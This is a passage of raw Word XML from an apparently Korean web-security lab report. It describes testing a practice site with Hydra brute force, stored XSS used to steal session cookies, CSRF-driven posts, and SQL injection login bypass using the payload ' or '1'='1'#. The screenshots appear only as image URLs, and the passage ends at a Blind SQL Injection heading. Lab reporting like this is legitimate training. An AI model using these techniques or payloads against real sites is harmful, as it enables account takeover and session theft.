            <wp:docPr id="29" name="그림 29" descr="https://lh6.googleusercontent.com/02r0W1ytGEse1x70ky6RcKyQtwFw_87bTR3FA2OEKT_VyNTCqVZeaX7Qp8ozjHE1Qjmst0vkitVUT-u6wY9J_NNvWEhQmugjtJHAVfejOV846Zzo-eHYGPNA6OUs4WWSAxdouK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02r0W1ytGEse1x70ky6RcKyQtwFw_87bTR3FA2OEKT_VyNTCqVZeaX7Qp8ozjHE1Qjmst0vkitVUT-u6wY9J_NNvWEhQmugjtJHAVfejOV846Zzo-eHYGPNA6OUs4WWSAxdouK5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585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="00000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572000" cy="109437"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="30" name="그림 30" descr="https://lh3.googleusercontent.com/HnqHVvp-ptm1qlmUn7BrjCJj7FbUUw-9u2yA4nLAZ6mcpEejpS97apVbZ7Epz6Vghi16ngaGFXRtiMIg-oMZ4cRq9D8JZeyfjgKkGVsYxBICq4vVQTb0-DH79_R0f6Povv85Vx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HnqHVvp-ptm1qlmUn7BrjCJj7FbUUw-9u2yA4nLAZ6mcpEejpS97apVbZ7Epz6Vghi16ngaGFXRtiMIg-oMZ4cRq9D8JZeyfjgKkGVsYxBICq4vVQTb0-DH79_R0f6Povv85Vx7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91" cy="1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85" w:rsidRDefault="00C73585" w:rsidP="00C73585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610100" cy="145363"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="31" name="그림 31" descr="https://lh4.googleusercontent.com/dZgNuTMSNWe82wCVtImEuKrEpjy2XCib74Dvzjn6CiEbigT0_yysuiCBnisU1Wk_zg_KMW3Kz6C4tneLsQh8GHADfYE1wEZNIxqHUcR4Q8eecXdsqvGiRZtOHl9jBsxEybLqXG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dZgNuTMSNWe82wCVtImEuKrEpjy2XCib74Dvzjn6CiEbigT0_yysuiCBnisU1Wk_zg_KMW3Kz6C4tneLsQh8GHADfYE1wEZNIxqHUcR4Q8eecXdsqvGiRZtOHl9jBsxEybLqXGY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1" cy="1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85" w:rsidRPr="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C7358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73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Hydra </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>툴을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사용해서</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hacker </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정과</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> user1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>계정에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대한</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Brute Forcing </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격을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실시</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, DB</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에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저장된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비밀번호와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일치하는</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Password</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를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찾아내는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것을</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C73585">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C73585">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRDefault="00C73585" w:rsidP="0040771B">
      <w:pPr>
        <w:pStyle w:val="a4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X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SS[Cross Site Script] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C73585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312920" cy="1432560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="그림 32" descr="https://lh5.googleusercontent.com/q_-TXyJFvw-JhHK8yiSQKvJ6BqIe1JbmlJ06192cLv8HPBYFlMs225J7dcvHBlU40sDG7IsCC6de5Q72bW6Zwgm7XnKeI4T2peY0-62wMk5KIn7C8LLBDSiU4KxW0I26ScBEk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5.googleusercontent.com/q_-TXyJFvw-JhHK8yiSQKvJ6BqIe1JbmlJ06192cLv8HPBYFlMs225J7dcvHBlU40sDG7IsCC6de5Q72bW6Zwgm7XnKeI4T2peY0-62wMk5KIn7C8LLBDSiU4KxW0I26ScBEkMB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85" w:rsidRDefault="00C73585" w:rsidP="00C7358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X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
      <w:r w:rsidR="005D4EB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 이용해 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>게시 글에 J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ava script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를</w:t>
      </w:r>
      <w:r w:rsidR="005D4EB1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D4EB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>등록해</w:t>
      </w:r>
      <w:r w:rsidR="005D4EB1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D4EB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>세션 쿠키 값 획득이 가능한지 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D4EB1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB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335780" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="33" name="그림 33" descr="https://lh4.googleusercontent.com/0ddU3kS39GVdlMQP8toNjjDS8SQzd991P6I8J_w6gmNeaBr4z-tNf9Uq3AGAPdtomU96_FqLa95cBhTHfLhlsh3-LLqZsD59JUKwQ5p__96oebD7ll5CXw1BPctBRFRAxaMHm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4.googleusercontent.com/0ddU3kS39GVdlMQP8toNjjDS8SQzd991P6I8J_w6gmNeaBr4z-tNf9Uq3AGAPdtomU96_FqLa95cBhTHfLhlsh3-LLqZsD59JUKwQ5p__96oebD7ll5CXw1BPctBRFRAxaMHm6E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B1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB1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5D4EB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">확인 후 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BT</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 돌아와 웹 서비스를 실행 후 쿠키 값을 저장하기 위한 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일 생성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D4EB1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB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328160" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34" name="그림 34" descr="https://lh3.googleusercontent.com/7_vWSOT4ykxkNdM0Wz-gIY9y2bnYOeTDOHLF2F6Cb3ikEksLqKNzozNbrK7fIsC5aCvBKtadBjkxFu4ZxoztXECKeTSqpsAD9kPxKstakeeugvF8wlUoea40DwyMa5R8y959y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3.googleusercontent.com/7_vWSOT4ykxkNdM0Wz-gIY9y2bnYOeTDOHLF2F6Cb3ikEksLqKNzozNbrK7fIsC5aCvBKtadBjkxFu4ZxoztXECKeTSqpsAD9kPxKstakeeugvF8wlUoea40DwyMa5R8y959ybN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B1" w:rsidRPr="005D4EB1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB1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5D4EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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및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확인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유도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게시</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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글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업로드</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>게시</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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글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확인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후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세션이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저장된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파일</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D4EB1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB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358640" cy="1508760"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="35" name="그림 35" descr="https://lh5.googleusercontent.com/J4_0rdfi2OXzJKe_F2eoxpfWiRCBfla-KcOLwDZI4X1Xjqm6ii2l50Hxm2i5bYeBCoUq-FqLn00qqeT8N8WnkzRoqqHeLHXGzAhYCKdxGijUChdaIpQNuUN9ZDD6NTIqzq07NY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5.googleusercontent.com/J4_0rdfi2OXzJKe_F2eoxpfWiRCBfla-KcOLwDZI4X1Xjqm6ii2l50Hxm2i5bYeBCoUq-FqLn00qqeT8N8WnkzRoqqHeLHXGzAhYCKdxGijUChdaIpQNuUN9ZDD6NTIqzq07NYT_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B1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB1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저장된 세션을 적용 후 세션이 유지되는지 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D4EB1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB1">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D4EB1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB1">
      <w:pPr>
        <w:ind w:left="1164"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D4EB1" w:rsidRPr="00B609F1" w:rsidRDefault="005D4EB1" w:rsidP="0040771B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RF</w:t>
      </w:r>
      <w:r w:rsidR="00B609F1" w:rsidRPr="00B609F1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00B609F1"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 w:rsidR="00B609F1" w:rsidRPr="00B609F1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공격 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B609F1" w:rsidRDefault="00B609F1" w:rsidP="00B609F1">
      <w:pPr>
        <w:ind w:firstLine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290060" cy="1706880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="36" name="그림 36" descr="https://lh5.googleusercontent.com/JwzTA3_1-CMLK8w45YthmEWDxohL2ZcnrUDEs0hXqrFQICboD4f_m98GwcaXYp4WG6nV0RLMXae9HQKmho8LcrKIVxnpkIMvp_Xjo8HXrO6VsIfef64QThTO0SEHyVBpomAj7k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JwzTA3_1-CMLK8w45YthmEWDxohL2ZcnrUDEs0hXqrFQICboD4f_m98GwcaXYp4WG6nV0RLMXae9HQKmho8LcrKIVxnpkIMvp_Xjo8HXrO6VsIfef64QThTO0SEHyVBpomAj7kDx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1" w:rsidRPr="00B609F1" w:rsidRDefault="00B609F1" w:rsidP="00B609F1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B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>회원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정보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수정에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공격자가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의도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비밀번호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변경을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시도하려고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했으나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기존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비밀번호를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확인하는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과정이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포함되어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공격이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어려움</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B609F1" w:rsidRDefault="00B609F1" w:rsidP="00B609F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297680" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="37" name="그림 37" descr="https://lh3.googleusercontent.com/GDBnRJCy-fq6XzveZ5GODxgwmye7X0yYNpkhQ19nxCIlBJ9fqvLEBlk4kJtIbOr2L5JpOmiwjPLAunSTlGFK_FKDqu0usGDPuNQTkcYsVJgavpIWHLw66bWiYEuCv3_G9SZuw_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3.googleusercontent.com/GDBnRJCy-fq6XzveZ5GODxgwmye7X0yYNpkhQ19nxCIlBJ9fqvLEBlk4kJtIbOr2L5JpOmiwjPLAunSTlGFK_FKDqu0usGDPuNQTkcYsVJgavpIWHLw66bWiYEuCv3_G9SZuw_i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1" w:rsidRDefault="00B609F1" w:rsidP="00B609F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305300" cy="1211580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="38" name="그림 38" descr="https://lh4.googleusercontent.com/Ng0v_Lfzyhm_FIDpIGiTebXSI5Q8H3QLB6kFHGI8FbAmdnCrrQkBJzuzJsAOLH52crQ-qPyQ4oqGrPRdZwbrr0eDZsPG3g7VxQ2wrFTE4L7g-_kNr8LHiw7eG8DRnsidpTfUCH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4.googleusercontent.com/Ng0v_Lfzyhm_FIDpIGiTebXSI5Q8H3QLB6kFHGI8FbAmdnCrrQkBJzuzJsAOLH52crQ-qPyQ4oqGrPRdZwbrr0eDZsPG3g7VxQ2wrFTE4L7g-_kNr8LHiw7eG8DRnsidpTfUCHlh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1" w:rsidRDefault="00B609F1" w:rsidP="00B609F1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글을 게시할 때 넘어가는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 확인하고 자동 광고가 가능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시 글 작성 및 업로드</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B609F1" w:rsidRDefault="00B609F1" w:rsidP="00B609F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312920" cy="1112520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="그림 39" descr="https://lh4.googleusercontent.com/B_F94HakZMf6UlUUACHPI5FdFketOB8fZ6t8WDkBhUF9c3k9_K1yrzFYT0KADnWn0y1_ksv1w1m5bxVpkE8uZYf0Wn36ExSF7dy6Fw3dZRoQa4oYhzCEpYlNKCSaBIbhMBtGoc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4.googleusercontent.com/B_F94HakZMf6UlUUACHPI5FdFketOB8fZ6t8WDkBhUF9c3k9_K1yrzFYT0KADnWn0y1_ksv1w1m5bxVpkE8uZYf0Wn36ExSF7dy6Fw3dZRoQa4oYhzCEpYlNKCSaBIbhMBtGockj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1" w:rsidRDefault="00B609F1" w:rsidP="00B609F1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업로드 된 게시 글을 확인하면 공격자가 원하는 게시 글이 자동으로 등록되는 것을 볼 수 있음 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010076E" w:rsidRDefault="0010076E" w:rsidP="0010076E">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0010076E" w:rsidRPr="0010076E" w:rsidRDefault="0010076E" w:rsidP="0010076E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B609F1" w:rsidRDefault="00B609F1" w:rsidP="00407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B609F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">QL </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>njection [</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>인증우회,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>lind SQL Injection]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B609F1" w:rsidRPr="00B609F1" w:rsidRDefault="00B609F1" w:rsidP="00B609F1">
      <w:pPr>
        <w:pStyle w:val="a4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인증 우회 공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B609F1" w:rsidRDefault="00B609F1" w:rsidP="00B609F1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472940" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="40" name="그림 40" descr="https://lh6.googleusercontent.com/jTcDKUXpxDeBrFCbCsdTcIpnfzI0ltb5RfP1Qq7tJHmg6yyodcKO1HUH7pV93WvDp-u7V9HINGyInGmumL89IhKgSfSWJv8DWJC01QqYg4-zGDWoXIl_Lo_R4e6PmHgulJHWYr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6.googleusercontent.com/jTcDKUXpxDeBrFCbCsdTcIpnfzI0ltb5RfP1Qq7tJHmg6yyodcKO1HUH7pV93WvDp-u7V9HINGyInGmumL89IhKgSfSWJv8DWJC01QqYg4-zGDWoXIl_Lo_R4e6PmHgulJHWYrmc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1" w:rsidRPr="0040771B" w:rsidRDefault="00B609F1" w:rsidP="00B609F1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B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">‘ or ‘1’=’1’# </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을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이용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다른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인증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우회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공격은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실패</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>단</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DB </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상에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해당</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>쿼리를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실행했을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때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가장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상위에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위치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레코드의</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> pw</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>와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같은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값을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비밀번호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입력하는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경우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해당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레코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계정으로</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접속됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRPr="00B609F1" w:rsidRDefault="0040771B" w:rsidP="0040771B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1164"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B609F1" w:rsidRPr="0040771B" w:rsidRDefault="0040771B" w:rsidP="00B609F1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
